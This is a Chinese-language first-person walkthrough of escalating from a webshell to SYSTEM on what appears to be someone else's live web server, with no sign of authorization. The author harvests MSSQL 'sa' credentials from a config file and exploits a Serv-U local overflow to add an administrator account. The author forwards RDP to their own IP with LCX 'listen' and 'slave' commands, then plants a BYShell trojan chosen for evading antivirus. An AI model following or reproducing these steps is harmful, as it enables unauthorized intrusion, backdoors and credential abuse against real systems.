刚刚我们拿到了他的WEBSHELL,那么我就这样放下了?当然不可能了,不断进取,不断提升权限才是黑客最喜欢的(不过,声明一下本人不是黑客!)。那什么权限才是最终的呢?这个我不好说,一般来说拿到SYSTEM权限就算是真正的成功入侵了服务器,前面那个WEBSHELL仅仅是WEB权限。听说域管理员是最高的,不过本人不才,没搞过。
好废话不多说了,我们继续。。。。
通过WEBSHELL我们可以浏览他整个电脑上的盘符(当然要求WEBSHELL权限要相当高了),一般我们的IIS权限仅仅是GUEST权限,只能浏览当前站点下面的文件。不过这个网站显然不是那么安全,我们可以通过WEBSHELL浏览到所有盘,刚刚大概浏览了一下其他盘,没找到什么有价值的东西,不过发现他装有MSsql。
试着用WEBSHELL执行CMD提示找不到文件,一般来说就是被删掉了,或者是被改名字了。我们自己传一个CMD上去执行,可惜呀,其他盘没写权限,当前目录可写但是无执行权。使用WS C R I P T也无法执行CMD。
刚刚不是发现装有MSsql嘛,那他网站应该会用吧,不用的话装这东西干嘛?
o(∩_∩)o…哈哈
我们来翻一翻网站里面的文件,一般链接数据库的文件都在INC目录,CONFIG目录,INCLUDE目录中,结果在INCLUDE目录中找到数据库连接文件。如图:
为了安全,我把敏感信息涂掉了。
知道MSsql管理帐号和密码了,而且权限是SA那就等于有SYSTEM权限了,哈哈,当然前提很多。有了这个拿来干吗?直接连他,执行存储过程,加管理员帐号和密码,登陆服务器。呵呵。刚准备去连,结果发现这个服务器是在内网中,我没法连上他,汗~~~~
用WEBSHELL扫扫他的端口吧
看到1433了,确实装了MSsql了吧!还有个43958是SERV_U,嘿嘿。。。看到这个端口开着,我们就又有机会了,试试SERV_U的那个本地溢出漏洞是否存在。
我们加个管理员 neeke 密码 neeke,然后提交,再次查看系统帐户:
刚才我们加的帐号已经有了,并且是系统用户组。可还是没用啊,又连不上他,别急,能执行命令行,还怕没权限?呵呵
我们传个LCX上去
我们可以看到已经传到网站目录下了。
然后继续SERV_U提权,执行命令 netstat –an >e:\www\xajswsite\netstat.txt
看看当前端口状态
没有看到3389,结合前面端口扫描结果可以肯定没开,还有种可能是改了端口号了,这里面我们觉得可疑的端口就是5529和65500
我们试试看能不能连上,在自己的机子上执行lcx –listen 51 3800
通过SERV_U溢出,我们执行:lcx –slave 自己的IP 51 127.0.0.1 3389(这里我还是不确定,所以就先试试3389)
看看有数据传输了,端口已经映射成功了。
可是链接失败,OK!换端口。
看到这个消息,可以肯定是改成5529了,只是还是无法连,我也不知道是什么原因。
看来反向,正向都没办法了,只能玩远程控制木马了。灰鸽子?不行!不免杀,不过主动防御。用哪个呢?想了会,决定用BYSHELL了,自称过好几款杀软的主动防御。我们来配置一个马。
生成后传到网站上。然后还是靠SERV_U执行他
几秒钟后:服务器上线了,被我们控制了。
为了确定就是服务器,我们PING他:
这下可以肯定了!
OK,服务器入侵完毕,SYSTEM权限已经拿到。
